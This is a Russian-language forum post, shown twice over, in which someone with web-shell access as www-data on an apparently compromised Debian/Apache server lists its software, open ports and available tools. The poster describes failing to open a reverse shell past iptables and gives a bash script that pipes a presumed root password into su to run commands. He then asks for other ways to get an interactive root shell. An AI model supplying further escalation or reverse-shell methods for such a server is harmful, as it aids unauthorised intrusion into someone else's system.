tmp
27.05.2012, 14:46
Ситуация такова:
Сервер:
Server software: Apache/1.3.33 (Unix) PHP/4.4.1 mod_ssl/2.8.22 OpenSSL/0.9.7i
Disabled PHP Functions: none
cURL support: enabled
Supported databases: MySql (4.0.20), PostgreSQL
OS version: Linux version 2.6.31.5xen64 (root@24h01) (gcc version 4.1.2 20060613 (prerelease) (Debian 4.1.1-5)) #1 SMP Wed Nov 4 16:28:19 CET 2009
Distr name: Debian GNU/%s 2.2 %h
Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, locate
Danger: iptables
Downloaders: wget, lwp-mirror
Открытые порты:
ctive Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3307 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.169:80 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:80 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:81 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.169:443 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:443 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:444 0.0.0.0:* LISTEN
tcp 0 0 :::22 :::* LISTEN
Открытые порты на интернет:
80, 81, 443, 444
остальные отфильтрованы.
Есть предположительно пароль root
Забиндить порт не получилось и не получается открыть бекконнект. Наверно настройки iptables.
Написал уже баш скрипт на подобии такого:
Code:
cmd=$1
(
sleep 1
echo "*root-pass*"
echo $cmd
sleep 1
echo "exit"
) | su
Но похоже su не выполняется от
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
при выполнении su --help помощь не выводится.
хотя
$ ls -la /bin/su
-rwsr-xr-x 1 root root 23420 Sep 26 2000 /bin/su
башскрипт без su работает отлично при выполнении его через php.
Больше пока не могу придумать возможные варианты. Может кто то подскажет еще какие ни будь варианты получения bash?
Заранее спасибо
PS
Сейчас подумал попробовать выполнить локальный коннект на 22 порт, но и ssh и telnet похоже тоже не выполняются (хотя права rwxr-xr-x) так как хелп не выдает.
Сервер:
Server software: Apache/1.3.33 (Unix) PHP/4.4.1 mod_ssl/2.8.22 OpenSSL/0.9.7i
Disabled PHP Functions: none
cURL support: enabled
Supported databases: MySql (4.0.20), PostgreSQL
OS version: Linux version 2.6.31.5xen64 (root@24h01) (gcc version 4.1.2 20060613 (prerelease) (Debian 4.1.1-5)) #1 SMP Wed Nov 4 16:28:19 CET 2009
Distr name: Debian GNU/%s 2.2 %h
Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, locate
Danger: iptables
Downloaders: wget, lwp-mirror
Открытые порты:
ctive Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3307 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.169:80 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:80 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:81 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.169:443 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:443 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:444 0.0.0.0:* LISTEN
tcp 0 0 :::22 :::* LISTEN
Открытые порты на интернет:
80, 81, 443, 444
остальные отфильтрованы.
Есть предположительно пароль root
Забиндить порт не получилось и не получается открыть бекконнект. Наверно настройки iptables.
Написал уже баш скрипт на подобии такого:
Code:
cmd=$1
(
sleep 1
echo "*root-pass*"
echo $cmd
sleep 1
echo "exit"
) | su
Но похоже su не выполняется от
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
при выполнении su --help помощь не выводится.
хотя
$ ls -la /bin/su
-rwsr-xr-x 1 root root 23420 Sep 26 2000 /bin/su
башскрипт без su работает отлично при выполнении его через php.
Больше пока не могу придумать возможные варианты. Может кто то подскажет еще какие ни будь варианты получения bash?
Заранее спасибо
PS
Сейчас подумал попробовать выполнить локальный коннект на 22 порт, но и ssh и telnet похоже тоже не выполняются (хотя права rwxr-xr-x) так как хелп не выдает.